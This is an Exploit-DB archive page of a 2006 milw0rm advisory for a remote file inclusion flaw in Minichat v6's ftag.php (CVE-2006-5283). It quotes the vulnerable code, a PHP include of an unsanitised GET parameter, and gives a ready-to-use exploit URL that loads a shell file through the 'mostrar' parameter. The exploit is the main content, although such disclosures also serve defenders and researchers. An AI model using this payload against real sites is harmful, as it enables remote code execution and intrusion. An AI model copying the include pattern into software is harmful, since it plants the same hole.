Minichat v6 (ftag.php) Remote File Include Vulnerability



EDB-ID: 2519 CVE: 2006-5283OSVDB-ID: 29693
Author: ZickoxPublished: 2006-10-11Verified: Verified
Exploit Code:   DownloadVulnerable App:   N/A

Rating

(0.0)
Prev Home Next
###############################################################################################################
     Minichat v6 Remote File Include
###############################################################################################################
Affected Software .: Minichat v6
Class................... : Remote File Inclusion
Found by.............: Zickox
Contact. ...............: los_misfits[at]hotmail.com
###############################################################################################################
Download Software:
http://www.linkini.net/phpscripts/descargas/Tagboards%20(12%20Archivos)/Minichat%20v6.0%20-%20Con%20instalador.zip
###############################################################################################################
Affected File:
ftag.php
###############################################################################################################
Code vulnerable:
<? include($_GET['mostrar']); ?>
###############################################################################################################
Exploit:
http://www.victim.com/path/ftag.php?mostrar=shell.txt?
###############################################################################################################
Special GreetingS: NETTOXIC | Txis | The Shredder | erboot | trty | jasus | Cvir.System | ZeroHack Team
# milw0rm.com [2006-10-11]






Comments

No comments so far